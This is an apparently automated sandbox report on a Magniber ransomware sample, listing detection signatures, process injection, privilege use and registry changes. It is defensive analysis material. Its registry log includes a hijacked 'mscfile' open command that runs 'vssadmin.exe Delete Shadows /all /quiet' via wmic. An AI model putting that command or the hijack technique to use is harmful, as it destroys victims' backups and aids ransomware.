Malware Analysis Report

2025-01-22 20:47

Sample ID 241211-s7ns2sypgv
Target e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118
SHA256 0c77b9e8d6fab41fcef61741b7c1676348d874293ef2a1c8463fb2ff6616756d
Tags
magniber defense_evasion discovery execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0c77b9e8d6fab41fcef61741b7c1676348d874293ef2a1c8463fb2ff6616756d

Threat Level: Known bad

The file e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

magniber defense_evasion discovery execution impact ransomware

Magniber family

Magniber Ransomware

Detect magniber ransomware

Process spawned unexpected child process

Deletes shadow copies

Renames multiple (72) files with added filename extension

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Opens file in notepad (likely ransom note)

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Suspicious use of UnmapMainImage

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-11 15:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-11 15:46

Reported

2024-12-12 09:06

Platform

win7-20240903-en

Max time kernel

118s

Max time network

143s

Command Line

"taskhost.exe"

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (72) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\09OB1FV8\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SK4ZQZYF\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WMBPAEF9\desktop.ini C:\Windows\system32\DllHost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y07CWM3B\desktop.ini C:\Windows\system32\DllHost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2116 set thread context of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhost.exe
PID 2116 set thread context of 1172 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\Dwm.exe
PID 2116 set thread context of 1236 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 2116 set thread context of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0EF56ED1-B868-11EF-809B-F2DF7204BD4F} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001a0e42ee85f0884dbf8d17461b2df110000000000200000000001066000000010000200000005beb3fea0b67ce1238f5b053d2abd0a52a54e4e979fd1b6bd49b19947701e92d000000000e8000000002000020000000191dd114b789b1619a64dfdbcc784c9fec17db046b25e0fd347040cfcec29b812000000024f4460af3a4ebf817a31752ec32f466b8d66731503975a3db552e9df9ff8c504000000062f7df10c64e8e96e25e398b56d10479d565fa5883fa029bdfddc9b2e91c47a27a5b7220781266890e09e0a8ed588015ad7a8f75e422785e9cad49f89a8c1657 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "440156121" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 107619e5744cdb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001a0e42ee85f0884dbf8d17461b2df11000000000020000000000106600000001000020000000bb1e68a35f9e5ad3ebe12fa65875e3b73d1b45723db12fd2c7d02e882ce4d4e9000000000e800000000200002000000094e72d60a9a4126bafc51ab4006ad8bc16e99e12224260e6ac9b7c9da084fa13900000009e0314a567692c871c9b3f0ad26abbe893712fa86d7a4f8f9f04ffaed2994451aa931ff5ec7302c0c0a710f91dcfb21fc7d79b34b18b4a5f215baaf5ab54b41a404d6376012cbea959287416d14cade81e2cdea613c2381267768dbd2c4ab5de77f40c0b87c7019f581d3d8c5cfe1b5787a2e6484518b668bd6841ec6a8a3c2d599a31acd7cf3744c9c61b38fcc2e82c40000000a64ac924788632e3490f68b43148e48b7d9baf9cdfb5e7c7ef27c2833735c87b6b83159a26f77c5b487e6bbf94d4bd3cb42901e188cad778249904f8f79e0a82 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile C:\Windows\system32\taskhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\Dwm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\Dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\taskhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell C:\Windows\system32\taskhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open C:\Windows\system32\taskhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\taskhost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\Explorer.EXE N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1116 wrote to memory of 1748 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\notepad.exe
PID 1116 wrote to memory of 1748 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\notepad.exe
PID 1116 wrote to memory of 1748 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\notepad.exe
PID 1116 wrote to memory of 2032 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 2032 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 2032 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 2200 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1116 wrote to memory of 2200 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1116 wrote to memory of 2200 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1116 wrote to memory of 1676 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 1676 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1116 wrote to memory of 1676 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 2560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1676 wrote to memory of 2560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1676 wrote to memory of 2560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2032 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2032 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2032 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2356 wrote to memory of 2484 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2356 wrote to memory of 2484 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2356 wrote to memory of 2484 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2356 wrote to memory of 2484 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1488 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1488 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1488 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2752 wrote to memory of 2900 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2752 wrote to memory of 2900 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2752 wrote to memory of 2900 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2040 wrote to memory of 2872 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\wbem\wmic.exe
PID 2040 wrote to memory of 2872 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\wbem\wmic.exe
PID 2040 wrote to memory of 2872 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\wbem\wmic.exe
PID 2040 wrote to memory of 2476 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2476 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 2476 N/A C:\Windows\system32\DllHost.exe C:\Windows\system32\cmd.exe
PID 2476 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2476 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2476 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 3064 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 3064 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 3064 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 2132 wrote to memory of 1872 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2132 wrote to memory of 1872 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 2132 wrote to memory of 1872 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1236 wrote to memory of 540 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1236 wrote to memory of 540 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1236 wrote to memory of 540 N/A C:\Windows\Explorer.EXE C:\Windows\system32\wbem\wmic.exe
PID 1236 wrote to memory of 2740 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 2740 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 2740 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2740 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2740 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2740 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 1660 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1660 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1660 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\CompMgmtLauncher.exe
PID 1032 wrote to memory of 2504 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1032 wrote to memory of 2504 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1032 wrote to memory of 2504 N/A C:\Windows\system32\CompMgmtLauncher.exe C:\Windows\system32\wbem\wmic.exe
PID 1172 wrote to memory of 344 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
